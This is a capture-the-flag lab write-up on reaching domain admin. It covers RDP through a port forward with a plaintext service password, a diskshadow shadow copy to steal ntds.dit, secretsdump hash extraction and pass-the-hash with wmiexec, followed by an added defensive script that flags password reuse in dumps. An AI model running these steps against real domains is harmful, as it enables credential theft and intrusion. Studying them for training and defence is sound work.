I looked at all the usual methods of creating a shadow copy, including vssadmin and wbadmin. However, I then found an article that covered doing this with diskshadow, highlighted in the following document: https://github.com/decoder-it/whoami-priv-Hackinparis2019/blob/master/whoamiprivParis_Split.pdf. I wanted to try to get RDP access to the machine, and therefore set up a port forward to give me access.
portfwd add -l 3389 -r 172.16.249.200 -p 3389
I then tried to open an RDP session to the machine using remmina.
I decided to use xfreerdp through proxychains instead of remmina, hoping to get a little more access.
Install freerdp-x11
sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem
And I was given the RDP access I was looking for.
I now decided to run through diskshadow to see if I could create a shadow of the drive.
Shadow Copies
diskshadow
set context persistent nowriters
add volume c: alias dmwong
create
expose %dmwong% z:
Once I had created the shadow copy, I copied the files out of it using the modules found at https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug.
I opened PowerShell and imported the 2 modules.
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit
reg save hklm\system c:\temp\system.bak
Now that I had access to these files, I continued to download them onto my system for offline cracking.
Domain Admin
Now that I had these files offline, I needed to extract the hashes.
python /opt/impacket/examples/secretsdump.py -ntds ndts.dit -system system.bak LOCAL
This provided me with all the hashes from the Active Directory database. With all of these hashes, I decided to use the ‘Pass the Hash’ method to try to gain access to the Domain Controller as Administrator.
proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200
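The secretsdump output format (`domain\user:rid:lmhash:nthash:::`) is also what a defender reviews after an authorised audit of the NTDS, and it would have revealed the doppelganger directly: two accounts with the same password have the same NT hash. The following is an added example, not part of the write-up or of impacket, that parses that format and reports shared NT hashes, accounts with an empty password, and accounts still carrying an LM hash. The sample dump is constructed (account names follow the write-up, the hash values are filler); the two constants are the well-known hashes of the empty string.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (what secretsdump prints when LM is disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "" (account has no password)

# One credential line: optional "domain\" prefix, then user:rid:lm:nt::: (other lines are ignored).
SECRETS_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample in secretsdump layout; hashes are filler, not real values.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:1111111111111111111111111111aaaa:::
htb.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\netscaler-svc:1104:aad3b435b51404eeaad3b435b51404ee:2222222222222222222222222222bbbb:::
htb.local\\backup-svc:1105:aad3b435b51404eeaad3b435b51404ee:2222222222222222222222222222bbbb:::
htb.local\\mturner:1106:aad3b435b51404eeaad3b435b51404ee:3333333333333333333333333333cccc:::
htb.local\\legacy-user:1107:0102030405060708090a0b0c0d0e0f10:4444444444444444444444444444dddd:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:5555555555555555555555555555eeee:::
[*] Kerberos keys grabbed
htb.local\\Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""


def parse_secretsdump(text):
    """Return the credential entries found in secretsdump-style output."""
    entries = []
    for line in text.splitlines():
        m = SECRETS_RE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["rid"] = int(entry["rid"])
            entries.append(entry)
    return entries


def shared_nt_hashes(entries):
    """NT hashes used by more than one account, i.e. shared passwords."""
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e["nt"]].append(e["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def empty_passwords(entries):
    return [e["user"] for e in entries if e["nt"] == EMPTY_NT]


def lm_hashes_present(entries):
    """Accounts whose LM hash is set; LM is trivially reversible and should be disabled."""
    return [e["user"] for e in entries if e["lm"] != EMPTY_LM]


def audit(text):
    entries = parse_secretsdump(text)
    return {
        "accounts": len(entries),
        "shared_passwords": shared_nt_hashes(entries),
        "empty_passwords": empty_passwords(entries),
        "lm_hashes": lm_hashes_present(entries),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_DUMP)
    for users in report["shared_passwords"].values():
        print("same password:", ", ".join(users))
    print("empty password:", report["empty_passwords"])
    print("LM hash still stored:", report["lm_hashes"])
```

Comparing hashes this way finds reuse without ever recovering a password, which is the check that would have caught netscaler-svc and backup-svc sharing a credential long before it mattered.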
6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned
Author – Puckiestyle